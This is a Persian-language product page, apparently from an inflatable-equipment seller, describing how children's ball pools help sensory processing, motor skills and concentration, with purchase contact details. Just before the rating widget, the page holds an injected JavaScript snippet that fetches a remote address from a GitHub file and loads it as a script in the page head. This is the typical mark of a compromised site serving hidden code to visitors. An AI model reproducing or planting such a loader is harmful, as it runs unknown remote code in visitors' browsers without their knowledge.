فواید استخر توپ بادی
فواید استخر توپ بادی

فواید استخر توپ بادی

  • فواید استخر توپ بادی این خانه توپ های بادی فاوید زیادی دارند که ما در اینجا به این فواید می پردازیم

    فواید استخر توپ بادی کودکان چیست؟

    توپ های رنگی در یک خانه توپ بادی کودکان برای رشد مهارت ردیابی بینایی مفید می‌باشند. برای کودکان مبتلا به هر دو ناتوانی های جسمی و شناختی سودمند است. کودکان ،به افزایش عملکرد پردازش حسی کمک می‌کند، که می‌تواند به بهبود تمرکز و یکپارچگی اجتماعی کمک می‌کند. وزن متوسط توپ ها به درک کودک از مقدار نیروی که برای حرکت بدن آنها در میان فضا صرف می-شود کمک می‌کند. همراه با شنا کردن، کودک باید بدنش را در مقابل وزن توپ ها به حرکت در آورد، که تون عضله و هسته آنها را تقویت می‌کند. در حالی که بازی کردن در استخر توپ، کودک انگیزه پیدا می‌کند یک شرکت کننده ی فعال در درمان باشد. اخانه توپ بادی کودکان به تنظیم ورودی حسی کمک می‌کنند، که باعث بهبود مهارتهای تمرکز، مهارتهای اجتماعی متناسب با سن و واکنشهای بهتر به محرک های محیطی می‌شود. خانه توپ بادی کودکان، تنظیم پردازش حسی میشوند به این صورت که یا آرام یا بیشتر تحریک میشوند. هنگامی که در کنار یک سکو قرار می گیرند، کودکان می‌توانند به درون آن بپرند، که یک احساس کاملا جسمی را فراهم می‌کند. هنگامی که تا بالای سر پر از توپ می-شوند، کودکان می‌توانند برای یک تجربه ی آرامش بخش خودشان را در زیر توپها حرکت دهند و به جلو برانند. استخرهای توپ کودکان،همچنین فعالیت حرکتی درشت و آگاهی بدن را بهبود میبخشد. در مورد اندامهای کمتر استفاده شده توسط کودک (نظیر دست)یا در کودکان مبتلا به تاخیرهای عصبی، استخرهای توپ کودکان تون اندک ماهیچه، مهارتهای حرکتی درشت و درمان حرکت ناشی از محدودیت را افزایش میدهند. با تشویق حرکات مشابه با شنا، ولی در محیطی ایمن و خشک، استخرهای توپ کودکان اعتماد و هماهنگی را بهبود میبخشند. استخرهای توپ کودکان بازی کردن را تشویق میکنند، که درمانی لذت¬بخش ایجاد میکند، رشد، تعدیل و پیشرفت، همگی در محیطی کودک محور ترویج میدهد. این محیط بدون آب کمتر کثیف، و عاری از خطر است و برای کودکان در همه سطوح توانایی مناسب است در حالی که درمانهای چند حسی مفید برای تحریک، پروپریوسپشن، موقعیت یابی، ورودی حسی و در عین حال سرگرمی ساده برای کودکان فراهم میکند.

    انواع فواید استخر توپ بادی و فواید آن

    افزایش روحیه کودکان

    کودکان با بازی در خانه توپ بادی با هیجان و جذابیتی که برایشان دارد روحیه شاد و دور از استرسی خواهند داشت .و تجربه ای متفاوت برایشان رقم خواهد خورد .

    افزایش تمرکز کودک در خانه توپ بادی

    اکثریت مربیان با استفاده از خانه توپ بادی کودکان را به فراگیری آموزش علاقه مند می کنند .از جمله آموزش هایی که در استخر توپ می توان برای کودکان در نظر گرفت مفاهیم مخفی کردن درون استخر است.زمانی که کودک در انبوه توپ ها به دنبال شیئ مخفی شده می گردد باید دقت و تمرکز کافی برای پیدا کردن آنرا به کار گیرد و از این رو دقت و تمرکز او افزایش پیدا می کند.

    نحوه خرید خانه توپ بادی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خریدخانه توپ بادی توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید